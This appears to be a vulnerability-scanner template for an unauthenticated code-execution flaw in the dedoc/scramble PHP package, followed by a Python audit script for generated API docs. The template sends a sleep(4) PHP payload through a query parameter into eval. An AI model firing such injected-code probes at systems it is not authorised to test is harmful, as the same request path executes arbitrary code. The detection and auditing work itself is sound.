id: CVE-2026-44262

info:
  name: dedoc/scramble - Unauthenticated Remote Code Execution
  author: joshuavanderpoll
  severity: critical
  description: |
    dedoc/scramble >=0.13.2 <0.13.22 is vulnerable to RCE via its OpenAPI doc generator.
    When a controller assigns $request->input() to a variable named $code and uses it in validate(),
    Scramble's NodeRulesEvaluator calls extract($variables) before eval("return $code;"), allowing an
    attacker to overwrite $code with arbitrary PHP via a query parameter.
    Detection uses a timing probe (sleep) — no destructive exploitation.
  reference:
    - https://github.com/joshuavanderpoll/CVE-2026-44262
    - https://github.com/advisories/GHSA-4rm2-28vj-fj39
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L
    cvss-score: 9.4
    cve-id: CVE-2026-44262
    cwe-id: CWE-94
  tags: cve,cve2026,rce,laravel,scramble,php
  metadata:
    verified: true

flow: |
  http(1);
  try {
    if (template["vuln_param"]) {
      http(2);
    }
  } catch(e) {}

http:
  # Step 1: extract the vulnerable param name — no matchers, just detection
  # The extractor looks for a query param whose default resembles a Laravel validation rule
  - method: GET
    path:
      - "{{BaseURL}}/docs/api.json"
    extractors:
      - type: regex
        name: vuln_param
        internal: true
        # match "name": "X" followed within 600 chars by "default": "...|..." (rule-like)
        regex:
          - '"name"\s*:\s*"([^"]+)"[\s\S]{1,600}"default"\s*:\s*"[^"]*\|[^"]*"'
        group: 1
        part: body

  # Step 2: timing probe — only runs if vuln_param was found
  # sleep(4) triggers if eval() executes the attacker-controlled input, causing a ~4s delay
  - method: GET
    path:
      - "{{BaseURL}}/docs/api.json?{{vuln_param}}=sleep(4)"
    matchers:
      - type: dsl
        dsl:
          - "duration >= 3"
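For defenders who want to audit their own generated docs rather than scan them, step 1 of this template (the extractor) as an added Python example that is not part of the template or of dedoc/scramble: it walks the OpenAPI JSON for request parameters whose default is a rule-like string, which is the symptom the regex above keys on. The sample document and the RULE_RE heuristic are constructed for the demo.

```python
"""Audit an OpenAPI document for request parameters whose default value
looks like a Laravel validation rule string ("required|string|max:255").
Added example, not the template's or Scramble's own code: it re-implements
step 1 of the template (the extractor) as a JSON walk instead of a regex, so
a defender can audit a generated api.json offline. Sample doc is constructed."""
import json
import re

# Rule-like: pipe-separated tokens, each a bare word or word:args (constructed
# heuristic; tighter than the template's plain "|" check).
RULE_RE = re.compile(r"^[A-Za-z_]+(?::[^|]*)?(?:\|[A-Za-z_]+(?::[^|]*)?)+$")

def looks_like_rule(value):
    return isinstance(value, str) and bool(RULE_RE.match(value))

def _default_of(param):
    # OpenAPI 3 keeps the default under schema; tolerate a flat "default" too.
    return (param.get("schema") or {}).get("default", param.get("default"))

def find_rule_like_defaults(doc):
    """Return [(METHOD, path, param_name, default)] for suspicious parameters."""
    hits = []
    for path, item in (doc.get("paths") or {}).items():
        if not isinstance(item, dict):
            continue
        for method, op in item.items():
            if not isinstance(op, dict):
                continue
            for p in op.get("parameters") or []:
                d = _default_of(p)
                if looks_like_rule(d):
                    hits.append((method.upper(), path, p.get("name"), d))
    return hits

def audit(api_json_text):
    return find_rule_like_defaults(json.loads(api_json_text))

# Constructed sample: only the "code" query parameter carries a rule string.
SAMPLE_DOC = json.dumps({"openapi": "3.1.0", "paths": {"/api/items": {
    "get": {"parameters": [
        {"name": "page", "in": "query", "schema": {"type": "integer", "default": 1}},
        {"name": "code", "in": "query",
         "schema": {"type": "string", "default": "required|string|max:255"}}]},
    "post": {"parameters": [
        {"name": "title", "in": "query", "schema": {"type": "string", "default": "untitled"}}]},
}}})

if __name__ == "__main__":
    for hit in audit(SAMPLE_DOC):
        print("suspicious default: %s %s param=%s default=%r" % hit)
```

A hit means the generator emitted a validation rule as a parameter default, the same signal the template's extractor uses to select a parameter name; on an affected Scramble version that is the code path to patch (upgrade to >=0.13.22) before anything else.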